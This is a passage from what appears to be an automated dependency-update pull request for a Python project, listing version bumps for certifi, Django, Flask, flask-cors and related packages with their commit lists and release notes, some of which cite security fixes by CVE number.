[flask-cors](https://github.com/corydolphin/flask-cors) | `3.0.3` | `6.0.0` |\n| [gunicorn](https://github.com/benoitc/gunicorn) | `19.7.1` | `23.0.0` |\n| [idna](https://github.com/kjd/idna) | `2.6` | `3.7` |\n| [jinja2](https://github.com/pallets/jinja) | `2.10.1` | `3.1.6` |\n| [py](https://github.com/pytest-dev/py) | `1.5.2` | `1.11.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `1.5.3` | `2.4.0` |\n| [requests](https://github.com/psf/requests) | `2.22.0` | `2.32.4` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.25.3` | `2.5.0` |\n| [werkzeug](https://github.com/pallets/werkzeug) | `0.14.1` | `3.0.6` |\n\n\nUpdates `certifi` from 2018.1.18 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2018.01.18...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `django` from 2.2.2 to 4.2.24\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/5e23d8900201ba10bf76adf825179c72cbf2e1e2\"\u003e\u003ccode\u003e5e23d89\u003c/code\u003e\u003c/a\u003e [4.2.x] Bumped version for 4.2.24 release.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/31334e6965ad136a5e369993b01721499c5d1a92\"\u003e\u003ccode\u003e31334e6\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed CVE-2025-57833 -- Protected FilteredRelation against SQL inject...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/d5860d55ebe3623e6c6f8d6c5a1cdb28ae4a7505\"\u003e\u003ccode\u003ed5860d5\u003c/code\u003e\u003c/a\u003e [4.2.x] Added stub release notes and release date for 4.2.24.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/c3f98718976820da5123169027612324d09a89d6\"\u003e\u003ccode\u003ec3f9871\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed \u003ca href=\"https://redirect.github.com/django/django/issues/36499\"\u003e#36499\u003c/a\u003e -- Adjusted utils_tests.test_html.TestUtilsHtml.test_str...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/2a79837e19d2569c3e5162f3e0181a4e29bb7dba\"\u003e\u003ccode\u003e2a79837\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed test_utils.tests.HTMLEqualTests.test_parsing_errors following P...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/7335a1a9138e905aa681169c3b820fed207edfa5\"\u003e\u003ccode\u003e7335a1a\u003c/code\u003e\u003c/a\u003e [4.2.x] Refs \u003ca href=\"https://redirect.github.com/django/django/issues/36535\"\u003e#36535\u003c/a\u003e -- Doc'd that docutils \u0026lt; 0.22 is required.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/591b23a11b099081fc39d00171f5dc9efbd67e13\"\u003e\u003ccode\u003e591b23a\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed GitHub Action that checks commit prefixes to fetch PR head corr...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/0c9ab357b7559a1676ace17e469848739b525d79\"\u003e\u003ccode\u003e0c9ab35\u003c/code\u003e\u003c/a\u003e [4.2.x] Added GitHub Action to enforce stable branch commit message prefix.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/8293b0f52d086410bb480b7d6a79e614c8184761\"\u003e\u003ccode\u003e8293b0f\u003c/code\u003e\u003c/a\u003e [4.2.x] Added follow-up to CVE-2025-48432 to security archive.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/bc4d96cfc3ab8e26a2cd6b963b5f74ff0bffe9e2\"\u003e\u003ccode\u003ebc4d96c\u003c/code\u003e\u003c/a\u003e [4.2.x] Post-release version bump.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/django/django/compare/2.2.2...4.2.24\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask` from 1.0.2 to 2.2.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/releases\"\u003eflask's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.2.5\u003c/h2\u003e\n\u003cp\u003eThis is a security fix release for the 2.2.x release branch. Note that 2.3.x is the currently supported release branch; please upgrade to the latest version if possible.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity advisory: \u003ca href=\"https://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\"\u003ehttps://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\u003c/a\u003e, CVE-2023-30861\u003c/li\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/30?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/30?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.4\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/27?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/27?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/26?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/26?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/25?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/25?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/23?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/23?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release, which includes new features and removes previously deprecated code. The 2.2.x branch is now the supported bug fix branch, the 2.1.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as \u003ca href=\"https://pypi.org/project/pip-tools/\"\u003epip-tools\u003c/a\u003e to pin all dependencies and control upgrades.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/19?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/19?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/22?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/22?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/21?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/21?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/blob/main/CHANGES.rst\"\u003eflask's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.2.5\u003c/h2\u003e\n\u003cp\u003eReleased 2023-05-02\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.3.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003eVary: Cookie\u003c/code\u003e header when the session is accessed, modified, or refreshed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.4\u003c/h2\u003e\n\u003cp\u003eReleased 2023-04-25\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.3\u003c/h2\u003e\n\u003cp\u003eReleased 2023-02-15\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAutoescape is enabled by default for \u003ccode\u003e.svg\u003c/code\u003e template files. :issue:\u003ccode\u003e4831\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the type of \u003ccode\u003etemplate_folder\u003c/code\u003e to accept \u003ccode\u003epathlib.Path\u003c/code\u003e. :issue:\u003ccode\u003e4892\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--debug\u003c/code\u003e option to the \u003ccode\u003eflask run\u003c/code\u003e command. :issue:\u003ccode\u003e4777\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.2\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-08\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Werkzeug dependency to \u0026gt;= 2.2.2. This includes fixes related\nto the new faster router, header parsing, and the development\nserver. :pr:\u003ccode\u003e4754\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the default value for \u003ccode\u003eapp.env\u003c/code\u003e to be \u003ccode\u003e\u0026quot;production\u0026quot;\u003c/code\u003e. This\nattribute remains deprecated. :issue:\u003ccode\u003e4740\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.1\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-03\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSetting or accessing \u003ccode\u003ejson_encoder\u003c/code\u003e or \u003ccode\u003ejson_decoder\u003c/code\u003e raises a\ndeprecation warning. :issue:\u003ccode\u003e4732\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/47af817c8fe01045c641b97f8fb784c7ad864eee\"\u003e\u003ccode\u003e47af817\u003c/code\u003e\u003c/a\u003e release version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/afd63b16170b7c047f5758eb910c416511e9c965\"\u003e\u003ccode\u003eafd63b1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5109\"\u003e#5109\u003c/a\u003e from pallets/backport-vary-cookie\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/8646edca6f47e2cd57464081b3911218d4734f8d\"\u003e\u003ccode\u003e8646edc\u003c/code\u003e\u003c/a\u003e set \u003ccode\u003eVary: Cookie\u003c/code\u003e header consistently for session\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/a6367dac747c1e149c60767eee7e8aa9c281c58e\"\u003e\u003ccode\u003ea6367da\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5108\"\u003e#5108\u003c/a\u003e from pallets/werkzeug-compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/3fbfbad79fe294918459b70eb409d555b20de2c8\"\u003e\u003ccode\u003e3fbfbad\u003c/code\u003e\u003c/a\u003e werkzeug 2.3.3 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/726d3f4fa9e8a2960541debc2d2713571da54441\"\u003e\u003ccode\u003e726d3f4\u003c/code\u003e\u003c/a\u003e start version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/ddc7accaa2e83b328f969c120af2ce0804876b4a\"\u003e\u003ccode\u003eddc7acc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5081\"\u003e#5081\u003c/a\u003e from pallets/release-2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/74e03298200e33951ca350a35aa3a8c0b4ff8177\"\u003e\u003ccode\u003e74e0329\u003c/code\u003e\u003c/a\u003e release version 2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/2d460685b1b3d66c713739ee91183c22fb2e5dc8\"\u003e\u003ccode\u003e2d46068\u003c/code\u003e\u003c/a\u003e update dev env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/64bc45874daf4b9828830ea0037a19beb8364ee3\"\u003e\u003ccode\u003e64bc458\u003c/code\u003e\u003c/a\u003e update dev dependencies\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/flask/compare/1.0.2...2.2.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask-cors` from 3.0.3 to 6.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/corydolphin/flask-cors/releases\"\u003eflask-cors's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e6.0.0\u003c/h2\u003e\n\u003ch2\u003eBreaking\u003c/h2\u003e\n\u003cp\u003ePath specificity ordering has changed to improve specificity. This may break users who expected the previous incorrect ordering.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e[CVE-2024-6839] Sort Paths by Regex Specificity by \u003ca href=\"https://github.com/adrianosela\"\u003e\u003ccode\u003e@​adrianosela\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/391\"\u003ecorydolphin/flask-cors#391\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[CVE-2024-6844] Replace use of (urllib) unquote_plus with unquote by \u003ca href=\"https://github.com/adrianosela\"\u003e\u003ccode\u003e@​adrianosela\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/389\"\u003ecorydolphin/flask-cors#389\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[CVE-2024-6866] Case Sensitive Request Path Matching by \u003ca href=\"https://github.com/adrianosela\"\u003e\u003ccode\u003e@​adrianosela\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/390\"\u003ecorydolphin/flask-cors#390\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/corydolphin/flask-cors/compare/5.0.1...6.0.0\"\u003ehttps://github.com/corydolphin/flask-cors/compare/5.0.1...6.0.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e5.0.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eThis primarily changes packaging to use uv and a new release pipeline, along with some small documentation improvements\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e[Docs] Fix links to documentation by \u003ca href=\"https://github.com/coren-frankel\"\u003e\u003ccode\u003e@​coren-frankel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/369\"\u003ecorydolphin/flask-cors#369\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix minor typos by \u003ca href=\"https://github.com/kkirsche\"\u003e\u003ccode\u003e@​kkirsche\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/371\"\u003ecorydolphin/flask-cors#371\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMigrate packaging and environment management to use uv by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/377\"\u003ecorydolphin/flask-cors#377\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix release pipeline by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/378\"\u003ecorydolphin/flask-cors#378\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAlways use trusted publishing by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/379\"\u003ecorydolphin/flask-cors#379\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eWorkaround license publishing issue by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/380\"\u003ecorydolphin/flask-cors#380\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix packaging: missing source files by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/381\"\u003ecorydolphin/flask-cors#381\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coren-frankel\"\u003e\u003ccode\u003e@​coren-frankel\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/369\"\u003ecorydolphin/flask-cors#369\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kkirsche\"\u003e\u003ccode\u003e@​kkirsche\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/371\"\u003ecorydolphin/flask-cors#371\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/corydolphin/flask-cors/compare/5.0.0...5.0.01\"\u003ehttps://github.com/corydolphin/flask-cors/compare/5.0.0...5.0.01\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e5.0.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBreaking: Change default to disable private network access by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/368\"\u003ecorydolphin/flask-cors#368\u003c/a\u003e\nThis effectively resolves  \u003ca href=\"https://github.com/advisories/GHSA-hxwh-jpp2-84pm\"\u003ehttps://github.com/advisories/GHSA-hxwh-jpp2-84pm\u003c/a\u003e \u003ca href=\"https://osv.dev/vulnerability/PYSEC-2024-71\"\u003ehttps://osv.dev/vulnerability/PYSEC-2024-71\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/corydolphin/flask-cors/compare/4.0.2...5.0.0\"\u003ehttps://github.com/corydolphin/flask-cors/compare/4.0.2...5.0.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.0.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump requests from 2.31.0 to 2.32.0 in /docs by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/358\"\u003ecorydolphin/flask-cors#358\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackwards Compatible Fix for CVE-2024-6221 by \u003ca href=\"https://github.com/adrianosela\"\u003e\u003ccode\u003e@​adrianosela\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/363\"\u003ecorydolphin/flask-cors#363\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd unit tests for Private-Network by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/367\"\u003ecorydolphin/flask-cors#367\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/358\"\u003ecorydolphin/flask-cors#358\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/adrianosela\"\u003e\u003ccode\u003e@​adrianosela\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/363\"\u003ecorydolphin/flask-cors#363\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca 